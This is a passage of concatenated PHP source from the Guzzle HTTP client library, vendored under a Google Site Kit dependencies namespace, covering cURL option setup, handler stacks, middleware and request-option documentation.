static function ($ch, $write) use($sink) : int { return $sink->write($write); }; $timeoutRequiresNoSignal = \false; if (isset($options['timeout'])) { $timeoutRequiresNoSignal |= $options['timeout'] < 1; $conf[\CURLOPT_TIMEOUT_MS] = $options['timeout'] * 1000; } // CURL default value is CURL_IPRESOLVE_WHATEVER if (isset($options['force_ip_resolve'])) { if ('v4' === $options['force_ip_resolve']) { $conf[\CURLOPT_IPRESOLVE] = \CURL_IPRESOLVE_V4; } elseif ('v6' === $options['force_ip_resolve']) { $conf[\CURLOPT_IPRESOLVE] = \CURL_IPRESOLVE_V6; } } if (isset($options['connect_timeout'])) { $timeoutRequiresNoSignal |= $options['connect_timeout'] < 1; $conf[\CURLOPT_CONNECTTIMEOUT_MS] = $options['connect_timeout'] * 1000; } if ($timeoutRequiresNoSignal && \strtoupper(\substr(\PHP_OS, 0, 3)) !== 'WIN') { $conf[\CURLOPT_NOSIGNAL] = \true; } if (isset($options['proxy'])) { if (!\is_array($options['proxy'])) { $conf[\CURLOPT_PROXY] = $options['proxy']; } else { $scheme = $easy->request->getUri()->getScheme(); if (isset($options['proxy'][$scheme])) { $host = $easy->request->getUri()->getHost(); if (isset($options['proxy']['no']) && \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::isHostInNoProxy($host, $options['proxy']['no'])) { unset($conf[\CURLOPT_PROXY]); } else { $conf[\CURLOPT_PROXY] = $options['proxy'][$scheme]; } } } } if (isset($options['crypto_method'])) { $protocolVersion = $easy->request->getProtocolVersion(); // If HTTP/2, upgrade TLS 1.0 and 1.1 to 1.2 if ('2' === $protocolVersion || '2.0' === $protocolVersion) { if (\STREAM_CRYPTO_METHOD_TLSv1_0_CLIENT === $options['crypto_method'] || \STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT === $options['crypto_method'] || \STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT === $options['crypto_method']) { $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_2; } elseif (\defined('STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT') && \STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT === $options['crypto_method']) { if (!self::supportsTls13()) { throw new \InvalidArgumentException('Invalid crypto_method request option: TLS 1.3 not supported by your version of cURL'); } $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_3; } else { throw new \InvalidArgumentException('Invalid crypto_method request option: unknown version provided'); } } elseif (\STREAM_CRYPTO_METHOD_TLSv1_0_CLIENT === $options['crypto_method']) { $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_0; } elseif (\STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT === $options['crypto_method']) { $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_1; } elseif (\STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT === $options['crypto_method']) { if (!self::supportsTls12()) { throw new \InvalidArgumentException('Invalid crypto_method request option: TLS 1.2 not supported by your version of cURL'); } $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_2; } elseif (\defined('STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT') && \STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT === $options['crypto_method']) { if (!self::supportsTls13()) { throw new \InvalidArgumentException('Invalid crypto_method request option: TLS 1.3 not supported by your version of cURL'); } $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_3; } else { throw new \InvalidArgumentException('Invalid crypto_method request option: unknown version provided'); } } if (isset($options['cert'])) { $cert = $options['cert']; if (\is_array($cert)) { $conf[\CURLOPT_SSLCERTPASSWD] = $cert[1]; $cert = $cert[0]; } if (!\file_exists($cert)) { throw new \InvalidArgumentException("SSL certificate not found: {$cert}"); } // OpenSSL (versions 0.9.3 and later) also support "P12" for PKCS#12-encoded files. // see https://curl.se/libcurl/c/CURLOPT_SSLCERTTYPE.html $ext = \pathinfo($cert, \PATHINFO_EXTENSION); if (\preg_match('#^(der|p12)$#i', $ext)) { $conf[\CURLOPT_SSLCERTTYPE] = \strtoupper($ext); } $conf[\CURLOPT_SSLCERT] = $cert; } if (isset($options['ssl_key'])) { if (\is_array($options['ssl_key'])) { if (\count($options['ssl_key']) === 2) { [$sslKey, $conf[\CURLOPT_SSLKEYPASSWD]] = $options['ssl_key']; } else { [$sslKey] = $options['ssl_key']; } } $sslKey = $sslKey ?? $options['ssl_key']; if (!\file_exists($sslKey)) { throw new \InvalidArgumentException("SSL private key not found: {$sslKey}"); } $conf[\CURLOPT_SSLKEY] = $sslKey; } if (isset($options['progress'])) { $progress = $options['progress']; if (!\is_callable($progress)) { throw new \InvalidArgumentException('progress client option must be callable'); } $conf[\CURLOPT_NOPROGRESS] = \false; $conf[\CURLOPT_PROGRESSFUNCTION] = static function ($resource, int $downloadSize, int $downloaded, int $uploadSize, int $uploaded) use($progress) { $progress($downloadSize, $downloaded, $uploadSize, $uploaded); }; } if (!empty($options['debug'])) { $conf[\CURLOPT_STDERR] = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::debugResource($options['debug']); $conf[\CURLOPT_VERBOSE] = \true; } } /** * This function ensures that a response was set on a transaction. If one * was not set, then the request is retried if possible. This error * typically means you are sending a payload, curl encountered a * "Connection died, retrying a fresh connect" error, tried to rewind the * stream, and then encountered a "necessary data rewind wasn't possible" * error, causing the request to be sent through curl_multi_info_read() * without an error status. * * @param callable(RequestInterface, array): PromiseInterface $handler */ private static function retryFailedRewind(callable $handler, \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy, array $ctx) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { try { // Only rewind if the body has been read from. $body = $easy->request->getBody(); if ($body->tell() > 0) { $body->rewind(); } } catch (\RuntimeException $e) { $ctx['error'] = 'The connection unexpectedly failed without ' . 'providing an error. The request would have been retried, ' . 'but attempting to rewind the request body failed. ' . 'Exception: ' . $e; return self::createRejection($easy, $ctx); } // Retry no more than 3 times before giving up. if (!isset($easy->options['_curl_retries'])) { $easy->options['_curl_retries'] = 1; } elseif ($easy->options['_curl_retries'] == 2) { $ctx['error'] = 'The cURL request was retried 3 times ' . 'and did not succeed. The most likely reason for the failure ' . 'is that cURL was unable to rewind the body of the request ' . 'and subsequent retries resulted in the same error. Turn on ' . 'the debug option to see what went wrong. See ' . 'https://bugs.php.net/bug.php?id=47204 for more information.'; return self::createRejection($easy, $ctx); } else { ++$easy->options['_curl_retries']; } return $handler($easy->request, $easy->options); } private function createHeaderFn(\Google\Site_Kit_Dependencies\GuzzleHttp\Handler\EasyHandle $easy) : callable { if (isset($easy->options['on_headers'])) { $onHeaders = $easy->options['on_headers']; if (!\is_callable($onHeaders)) { throw new \InvalidArgumentException('on_headers must be callable'); } } else { $onHeaders = null; } return static function ($ch, $h) use($onHeaders, $easy, &$startingResponse) { $value = \trim($h); if ($value === '') { $startingResponse = \true; try { $easy->createResponse(); } catch (\Exception $e) { $easy->createResponseException = $e; return -1; } if ($onHeaders !== null) { try { $onHeaders($easy->response); } catch (\Exception $e) { // Associate the exception with the handle and trigger // a curl header write error by returning 0. $easy->onHeadersException = $e; return -1; } } } elseif ($startingResponse) { $startingResponse = \false; $easy->headers = [$value]; } else { $easy->headers[] = $value; } return \strlen($h); }; } public function __destruct() { foreach ($this->handles as $id => $handle) { \curl_close($handle); unset($this->handles[$id]); } } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; /** * Debug function used to describe the provided value type and class. * * @param mixed $input Any type of variable to describe the type of. This * parameter misses a typehint because of that. * * @return string Returns a string containing the type of the variable and * if a class is provided, the class name. * * @deprecated describe_type will be removed in guzzlehttp/guzzle:8.0. Use Utils::describeType instead. */ function describe_type($input) : string { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::describeType($input); } /** * Parses an array of header lines into an associative array of headers. * * @param iterable $lines Header lines array of strings in the following * format: "Name: Value" * * @deprecated headers_from_lines will be removed in guzzlehttp/guzzle:8.0. Use Utils::headersFromLines instead. */ function headers_from_lines(iterable $lines) : array { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::headersFromLines($lines); } /** * Returns a debug stream based on the provided variable. * * @param mixed $value Optional value * * @return resource * * @deprecated debug_resource will be removed in guzzlehttp/guzzle:8.0. Use Utils::debugResource instead. */ function debug_resource($value = null) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::debugResource($value); } /** * Chooses and creates a default handler to use based on the environment. * * The returned handler is not wrapped by any default middlewares. * * @return callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface Returns the best handler for the given system. * * @throws \RuntimeException if no viable Handler is available. * * @deprecated choose_handler will be removed in guzzlehttp/guzzle:8.0. Use Utils::chooseHandler instead. */ function choose_handler() : callable { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::chooseHandler(); } /** * Get the default User-Agent string to use with Guzzle. * * @deprecated default_user_agent will be removed in guzzlehttp/guzzle:8.0. Use Utils::defaultUserAgent instead. */ function default_user_agent() : string { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::defaultUserAgent(); } /** * Returns the default cacert bundle for the current system. * * First, the openssl.cafile and curl.cainfo php.ini settings are checked. * If those settings are not configured, then the common locations for * bundles found on Red Hat, CentOS, Fedora, Ubuntu, Debian, FreeBSD, OS X * and Windows are checked. If any of these file locations are found on * disk, they will be utilized. * * Note: the result of this function is cached for subsequent calls. * * @throws \RuntimeException if no bundle can be found. * * @deprecated default_ca_bundle will be removed in guzzlehttp/guzzle:8.0. This function is not needed in PHP 5.6+. */ function default_ca_bundle() : string { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::defaultCaBundle(); } /** * Creates an associative array of lowercase header names to the actual * header casing. * * @deprecated normalize_header_keys will be removed in guzzlehttp/guzzle:8.0. Use Utils::normalizeHeaderKeys instead. */ function normalize_header_keys(array $headers) : array { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::normalizeHeaderKeys($headers); } /** * Returns true if the provided host matches any of the no proxy areas. * * This method will strip a port from the host if it is present. Each pattern * can be matched with an exact match (e.g., "foo.com" == "foo.com") or a * partial match: (e.g., "foo.com" == "baz.foo.com" and ".foo.com" == * "baz.foo.com", but ".foo.com" != "foo.com"). * * Areas are matched in the following cases: * 1. "*" (without quotes) always matches any hosts. * 2. An exact match. * 3. The area starts with "." and the area is the last part of the host. e.g. * '.mit.edu' will match any host that ends with '.mit.edu'. * * @param string $host Host to check against the patterns. * @param string[] $noProxyArray An array of host patterns. * * @throws Exception\InvalidArgumentException * * @deprecated is_host_in_noproxy will be removed in guzzlehttp/guzzle:8.0. Use Utils::isHostInNoProxy instead. */ function is_host_in_noproxy(string $host, array $noProxyArray) : bool { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::isHostInNoProxy($host, $noProxyArray); } /** * Wrapper for json_decode that throws when an error occurs. * * @param string $json JSON data to parse * @param bool $assoc When true, returned objects will be converted * into associative arrays. * @param int $depth User specified recursion depth. * @param int $options Bitmask of JSON decode options. * * @return object|array|string|int|float|bool|null * * @throws Exception\InvalidArgumentException if the JSON cannot be decoded. * * @see https://www.php.net/manual/en/function.json-decode.php * @deprecated json_decode will be removed in guzzlehttp/guzzle:8.0. Use Utils::jsonDecode instead. */ function json_decode(string $json, bool $assoc = \false, int $depth = 512, int $options = 0) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::jsonDecode($json, $assoc, $depth, $options); } /** * Wrapper for JSON encoding that throws when an error occurs. * * @param mixed $value The value being encoded * @param int $options JSON encode option bitmask * @param int $depth Set the maximum depth. Must be greater than zero. * * @throws Exception\InvalidArgumentException if the JSON cannot be encoded. * * @see https://www.php.net/manual/en/function.json-encode.php * @deprecated json_encode will be removed in guzzlehttp/guzzle:8.0. Use Utils::jsonEncode instead. */ function json_encode($value, int $options = 0, int $depth = 512) : string { return \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::jsonEncode($value, $options, $depth); } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Creates a composed Guzzle handler function by stacking middlewares on top of * an HTTP handler function. * * @final */ class HandlerStack { /** * @var (callable(RequestInterface, array): PromiseInterface)|null */ private $handler; /** * @var array{(callable(callable(RequestInterface, array): PromiseInterface): callable), (string|null)}[] */ private $stack = []; /** * @var (callable(RequestInterface, array): PromiseInterface)|null */ private $cached; /** * Creates a default handler stack that can be used by clients. * * The returned handler will wrap the provided handler or use the most * appropriate default handler for your system. The returned HandlerStack has * support for cookies, redirects, HTTP error exceptions, and preparing a body * before sending. * * The returned handler stack can be passed to a client in the "handler" * option. * * @param (callable(RequestInterface, array): PromiseInterface)|null $handler HTTP handler function to use with the stack. If no * handler is provided, the best handler for your * system will be utilized. */ public static function create(?callable $handler = null) : self { $stack = new self($handler ?: \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::chooseHandler()); $stack->push(\Google\Site_Kit_Dependencies\GuzzleHttp\Middleware::httpErrors(), 'http_errors'); $stack->push(\Google\Site_Kit_Dependencies\GuzzleHttp\Middleware::redirect(), 'allow_redirects'); $stack->push(\Google\Site_Kit_Dependencies\GuzzleHttp\Middleware::cookies(), 'cookies'); $stack->push(\Google\Site_Kit_Dependencies\GuzzleHttp\Middleware::prepareBody(), 'prepare_body'); return $stack; } /** * @param (callable(RequestInterface, array): PromiseInterface)|null $handler Underlying HTTP handler. */ public function __construct(?callable $handler = null) { $this->handler = $handler; } /** * Invokes the handler stack as a composed handler * * @return ResponseInterface|PromiseInterface */ public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) { $handler = $this->resolve(); return $handler($request, $options); } /** * Dumps a string representation of the stack. * * @return string */ public function __toString() { $depth = 0; $stack = []; if ($this->handler !== null) { $stack[] = '0) Handler: ' . $this->debugCallable($this->handler); } $result = ''; foreach (\array_reverse($this->stack) as $tuple) { ++$depth; $str = "{$depth}) Name: '{$tuple[1]}', "; $str .= 'Function: ' . $this->debugCallable($tuple[0]); $result = "> {$str}\n{$result}"; $stack[] = $str; } foreach (\array_keys($stack) as $k) { $result .= "< {$stack[$k]}\n"; } return $result; } /** * Set the HTTP handler that actually returns a promise. * * @param callable(RequestInterface, array): PromiseInterface $handler Accepts a request and array of options and * returns a Promise. */ public function setHandler(callable $handler) : void { $this->handler = $handler; $this->cached = null; } /** * Returns true if the builder has a handler. */ public function hasHandler() : bool { return $this->handler !== null; } /** * Unshift a middleware to the bottom of the stack. * * @param callable(callable): callable $middleware Middleware function * @param string $name Name to register for this middleware. */ public function unshift(callable $middleware, ?string $name = null) : void { \array_unshift($this->stack, [$middleware, $name]); $this->cached = null; } /** * Push a middleware to the top of the stack. * * @param callable(callable): callable $middleware Middleware function * @param string $name Name to register for this middleware. */ public function push(callable $middleware, string $name = '') : void { $this->stack[] = [$middleware, $name]; $this->cached = null; } /** * Add a middleware before another middleware by name. * * @param string $findName Middleware to find * @param callable(callable): callable $middleware Middleware function * @param string $withName Name to register for this middleware. */ public function before(string $findName, callable $middleware, string $withName = '') : void { $this->splice($findName, $withName, $middleware, \true); } /** * Add a middleware after another middleware by name. * * @param string $findName Middleware to find * @param callable(callable): callable $middleware Middleware function * @param string $withName Name to register for this middleware. */ public function after(string $findName, callable $middleware, string $withName = '') : void { $this->splice($findName, $withName, $middleware, \false); } /** * Remove a middleware by instance or name from the stack. * * @param callable|string $remove Middleware to remove by instance or name. */ public function remove($remove) : void { if (!\is_string($remove) && !\is_callable($remove)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a callable or string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->cached = null; $idx = \is_callable($remove) ? 0 : 1; $this->stack = \array_values(\array_filter($this->stack, static function ($tuple) use($idx, $remove) { return $tuple[$idx] !== $remove; })); } /** * Compose the middleware and handler into a single callable function. * * @return callable(RequestInterface, array): PromiseInterface */ public function resolve() : callable { if ($this->cached === null) { if (($prev = $this->handler) === null) { throw new \LogicException('No handler has been specified'); } foreach (\array_reverse($this->stack) as $fn) { /** @var callable(RequestInterface, array): PromiseInterface $prev */ $prev = $fn[0]($prev); } $this->cached = $prev; } return $this->cached; } private function findByName(string $name) : int { foreach ($this->stack as $k => $v) { if ($v[1] === $name) { return $k; } } throw new \InvalidArgumentException("Middleware not found: {$name}"); } /** * Splices a function into the middleware list at a specific position. */ private function splice(string $findName, string $withName, callable $middleware, bool $before) : void { $this->cached = null; $idx = $this->findByName($findName); $tuple = [$middleware, $withName]; if ($before) { if ($idx === 0) { \array_unshift($this->stack, $tuple); } else { $replacement = [$tuple, $this->stack[$idx]]; \array_splice($this->stack, $idx, 1, $replacement); } } elseif ($idx === \count($this->stack) - 1) { $this->stack[] = $tuple; } else { $replacement = [$this->stack[$idx], $tuple]; \array_splice($this->stack, $idx, 1, $replacement); } } /** * Provides a debug string for a given callable. * * @param callable|string $fn Function to write as a string. */ private function debugCallable($fn) : string { if (\is_string($fn)) { return "callable({$fn})"; } if (\is_array($fn)) { return \is_string($fn[0]) ? "callable({$fn[0]}::{$fn[1]})" : "callable(['" . \get_class($fn[0]) . "', '{$fn[1]}'])"; } /** @var object $fn */ return 'callable(' . \spl_object_hash($fn) . ')'; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJarInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface; /** * Functions used to create and wrap handlers with handler middleware. */ final class Middleware { /** * Middleware that adds cookies to requests. * * The options array must be set to a CookieJarInterface in order to use * cookies. This is typically handled for you by a client. * * @return callable Returns a function that accepts the next handler. */ public static function cookies() : callable { return static function (callable $handler) : callable { return static function ($request, array $options) use($handler) { if (empty($options['cookies'])) { return $handler($request, $options); } elseif (!$options['cookies'] instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJarInterface) { throw new \InvalidArgumentException('Google\\Site_Kit_Dependencies\\cookies must be an instance of GuzzleHttp\\Cookie\\CookieJarInterface'); } $cookieJar = $options['cookies']; $request = $cookieJar->withCookieHeader($request); return $handler($request, $options)->then(static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) use($cookieJar, $request) : ResponseInterface { $cookieJar->extractCookies($request, $response); return $response; }); }; }; } /** * Middleware that throws exceptions for 4xx or 5xx responses when the * "http_errors" request option is set to true. * * @param BodySummarizerInterface|null $bodySummarizer The body summarizer to use in exception messages. * * @return callable(callable): callable Returns a function that accepts the next handler. */ public static function httpErrors(?\Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizerInterface $bodySummarizer = null) : callable { return static function (callable $handler) use($bodySummarizer) : callable { return static function ($request, array $options) use($handler, $bodySummarizer) { if (empty($options['http_errors'])) { return $handler($request, $options); } return $handler($request, $options)->then(static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) use($request, $bodySummarizer) { $code = $response->getStatusCode(); if ($code < 400) { return $response; } throw \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException::create($request, $response, null, [], $bodySummarizer); }); }; }; } /** * Middleware that pushes history data to an ArrayAccess container. * * @param array|\ArrayAccess<int, array> $container Container to hold the history (by reference). * * @return callable(callable): callable Returns a function that accepts the next handler. * * @throws \InvalidArgumentException if container is not an array or ArrayAccess. */ public static function history(&$container) : callable { if (!\is_array($container) && !$container instanceof \ArrayAccess) { throw new \InvalidArgumentException('history container must be an array or object implementing ArrayAccess'); } return static function (callable $handler) use(&$container) : callable { return static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler, &$container) { return $handler($request, $options)->then(static function ($value) use($request, &$container, $options) { $container[] = ['request' => $request, 'response' => $value, 'error' => null, 'options' => $options]; return $value; }, static function ($reason) use($request, &$container, $options) { $container[] = ['request' => $request, 'response' => null, 'error' => $reason, 'options' => $options]; return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($reason); }); }; }; } /** * Middleware that invokes a callback before and after sending a request. * * The provided listener cannot modify or alter the response. It simply * "taps" into the chain to be notified before returning the promise. The * before listener accepts a request and options array, and the after * listener accepts a request, options array, and response promise. * * @param callable $before Function to invoke before forwarding the request. * @param callable $after Function invoked after forwarding. * * @return callable Returns a function that accepts the next handler. */ public static function tap(?callable $before = null, ?callable $after = null) : callable { return static function (callable $handler) use($before, $after) : callable { return static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler, $before, $after) { if ($before) { $before($request, $options); } $response = $handler($request, $options); if ($after) { $after($request, $options, $response); } return $response; }; }; } /** * Middleware that handles request redirects. * * @return callable Returns a function that accepts the next handler. */ public static function redirect() : callable { return static function (callable $handler) : RedirectMiddleware { return new \Google\Site_Kit_Dependencies\GuzzleHttp\RedirectMiddleware($handler); }; } /** * Middleware that retries requests based on the boolean result of * invoking the provided "decider" function. * * If no delay function is provided, a simple implementation of exponential * backoff will be utilized. * * @param callable $decider Function that accepts the number of retries, * a request, [response], and [exception] and * returns true if the request is to be retried. * @param callable $delay Function that accepts the number of retries and * returns the number of milliseconds to delay. * * @return callable Returns a function that accepts the next handler. */ public static function retry(callable $decider, ?callable $delay = null) : callable { return static function (callable $handler) use($decider, $delay) : RetryMiddleware { return new \Google\Site_Kit_Dependencies\GuzzleHttp\RetryMiddleware($decider, $handler, $delay); }; } /** * Middleware that logs requests, responses, and errors using a message * formatter. * * @phpstan-param \Psr\Log\LogLevel::* $logLevel Level at which to log requests. * * @param LoggerInterface $logger Logs messages. * @param MessageFormatterInterface|MessageFormatter $formatter Formatter used to create message strings. * @param string $logLevel Level at which to log requests. * * @return callable Returns a function that accepts the next handler. */ public static function log(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger, $formatter, string $logLevel = 'info') : callable { // To be compatible with Guzzle 7.1.x we need to allow users to pass a MessageFormatter if (!$formatter instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\MessageFormatter && !$formatter instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\MessageFormatterInterface) { throw new \LogicException(\sprintf('Argument 2 to %s::log() must be of type %s', self::class, \Google\Site_Kit_Dependencies\GuzzleHttp\MessageFormatterInterface::class)); } return static function (callable $handler) use($logger, $formatter, $logLevel) : callable { return static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options = []) use($handler, $logger, $formatter, $logLevel) { return $handler($request, $options)->then(static function ($response) use($logger, $request, $formatter, $logLevel) : ResponseInterface { $message = $formatter->format($request, $response); $logger->log($logLevel, $message); return $response; }, static function ($reason) use($logger, $request, $formatter) : PromiseInterface { $response = $reason instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException ? $reason->getResponse() : null; $message = $formatter->format($request, $response, \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::exceptionFor($reason)); $logger->error($message); return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($reason); }); }; }; } /** * This middleware adds a default content-type if possible, a default * content-length or transfer-encoding header, and the expect header. */ public static function prepareBody() : callable { return static function (callable $handler) : PrepareBodyMiddleware { return new \Google\Site_Kit_Dependencies\GuzzleHttp\PrepareBodyMiddleware($handler); }; } /** * Middleware that applies a map function to the request before passing to * the next handler. * * @param callable $fn Function that accepts a RequestInterface and returns * a RequestInterface. */ public static function mapRequest(callable $fn) : callable { return static function (callable $handler) use($fn) : callable { return static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler, $fn) { return $handler($fn($request), $options); }; }; } /** * Middleware that applies a map function to the resolved promise's * response. * * @param callable $fn Function that accepts a ResponseInterface and * returns a ResponseInterface. */ public static function mapResponse(callable $fn) : callable { return static function (callable $handler) use($fn) : callable { return static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler, $fn) { return $handler($request, $options)->then($fn); }; }; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; /** * This class contains a list of built-in Guzzle request options. * * @see https://docs.guzzlephp.org/en/latest/request-options.html */ final class RequestOptions { /** * allow_redirects: (bool|array) Controls redirect behavior. Pass false * to disable redirects, pass true to enable redirects, pass an * associative to provide custom redirect settings. Defaults to "false". * This option only works if your handler has the RedirectMiddleware. When * passing an associative array, you can provide the following key value * pairs: * * - max: (int, default=5) maximum number of allowed redirects. * - strict: (bool, default=false) Set to true to use strict redirects * meaning redirect POST requests with POST requests vs. doing what most * browsers do which is redirect POST requests with GET requests * - referer: (bool, default=false) Set to true to enable the Referer * header. * - protocols: (array, default=['http', 'https']) Allowed redirect * protocols. * - on_redirect: (callable) PHP callable that is invoked when a redirect * is encountered. The callable is invoked with the request, the redirect * response that was received, and the effective URI. Any return value * from the on_redirect function is ignored. */ public const ALLOW_REDIRECTS = 'allow_redirects'; /** * auth: (array) Pass an array of HTTP authentication parameters to use * with the request. The array must contain the username in index [0], * the password in index [1], and you can optionally provide a built-in * authentication type in index [2]. Pass null to disable authentication * for a request. */ public const AUTH = 'auth'; /** * body: (resource|string|null|int|float|StreamInterface|callable|\Iterator) * Body to send in the request. */ public const BODY = 'body'; /** * cert: (string|array) Set to a string to specify the path to a file * containing a PEM formatted SSL client side certificate. If a password * is required, then set cert to an array containing the path to the PEM * file in the first array element followed by the certificate password * in the second array element. */ public const CERT = 'cert'; /** * cookies: (bool|GuzzleHttp\Cookie\CookieJarInterface, default=false) * Specifies whether or not cookies are used in a request or what cookie * jar to use or what cookies to send. This option only works if your * handler has the `cookie` middleware. Valid values are `false` and * an instance of {@see Cookie\CookieJarInterface}. */ public const COOKIES = 'cookies'; /** * connect_timeout: (float, default=0) Float describing the number of * seconds to wait while trying to connect to a server. Use 0 to wait * 300 seconds (the default behavior). */ public const CONNECT_TIMEOUT = 'connect_timeout'; /** * crypto_method: (int) A value describing the minimum TLS protocol * version to use. * * This setting must be set to one of the * ``STREAM_CRYPTO_METHOD_TLS*_CLIENT`` constants. PHP 7.4 or higher is * required in order to use TLS 1.3, and cURL 7.34.0 or higher is required * in order to specify a crypto method, with cURL 7.52.0 or higher being * required to use TLS 1.3. */ public const CRYPTO_METHOD = 'crypto_method'; /** * debug: (bool|resource) Set to true or set to a PHP stream returned by * fopen() enable debug output with the HTTP handler used to send a * request. */ public const DEBUG = 'debug'; /** * decode_content: (bool, default=true) Specify whether or not * Content-Encoding responses (gzip, deflate, etc.) are automatically * decoded. */ public const DECODE_CONTENT = 'decode_content'; /** * delay: (int) The amount of time to delay before sending in milliseconds. */ public const DELAY = 'delay'; /** * expect: (bool|integer) Controls the behavior of the * "Expect: 100-Continue" header. * * Set to `true` to enable the "Expect: 100-Continue" header for all * requests that sends a body. Set to `false` to disable the * "Expect: 100-Continue" header for all requests. Set to a number so that * the size of the payload must be greater than the number in order to send * the Expect header. Setting to a number will send the Expect header for * all requests in which the size of the payload cannot be determined or * where the body is not rewindable. * * By default, Guzzle will add the "Expect: 100-Continue" header when the * size of the body of a request is greater than 1 MB and a request is * using HTTP/1.1. */ public const EXPECT = 'expect'; /** * form_params: (array) Associative array of form field names to values * where each value is a string or array of strings. Sets the Content-Type * header to application/x-www-form-urlencoded when no Content-Type header * is already present. */ public const FORM_PARAMS = 'form_params'; /** * headers: (array) Associative array of HTTP headers. Each value MUST be * a string or array of strings. */ public const HEADERS = 'headers'; /** * http_errors: (bool, default=true) Set to false to disable exceptions * when a non- successful HTTP response is received. By default, * exceptions will be thrown for 4xx and 5xx responses. This option only * works if your handler has the `httpErrors` middleware. */ public const HTTP_ERRORS = 'http_errors'; /** * idn: (bool|int, default=true) A combination of IDNA_* constants for * idn_to_ascii() PHP's function (see "options" parameter). Set to false to * disable IDN support completely, or to true to use the default * configuration (IDNA_DEFAULT constant). */ public const IDN_CONVERSION = 'idn_conversion'; /** * json: (mixed) Adds JSON data to a request. The provided value is JSON * encoded and a Content-Type header of application/json will be added to * the request if no Content-Type header is already present. */ public const JSON = 'json'; /** * multipart: (array) Array of associative arrays, each containing a * required "name" key mapping to the form field, name, a required * "contents" key mapping to a StreamInterface|resource|string, an * optional "headers" associative array of custom headers, and an * optional "filename" key mapping to a string to send as the filename in * the part. If no "filename" key is present, then no "filename" attribute * will be added to the part. */ public const MULTIPART = 'multipart'; /** * on_headers: (callable) A callable that is invoked when the HTTP headers * of the response have been received but the body has not yet begun to * download. */ public const ON_HEADERS = 'on_headers'; /** * on_stats: (callable) allows you to get access to transfer statistics of * a request and access the lower level transfer details of the handler * associated with your client. ``on_stats`` is a callable that is invoked * when a handler has finished sending a request. The callback is invoked * with transfer statistics about the request, the response received, or * the error encountered. Included in the data is the total amount of time * taken to send the request. */ public const ON_STATS = 'on_stats'; /** * progress: (callable) Defines a function to invoke when transfer * progress is made. The function accepts the following positional * arguments: the total number of bytes expected to be downloaded, the * number of bytes downloaded so far, the number of bytes expected to be * uploaded, the number of bytes uploaded so far. */ public const PROGRESS = 'progress'; /** * proxy: (string|array) Pass a string to specify an HTTP proxy, or an * array to specify different proxies for different protocols (where the * key is the protocol and the value is a proxy string). */ public const PROXY = 'proxy'; /** * query: (array|string) 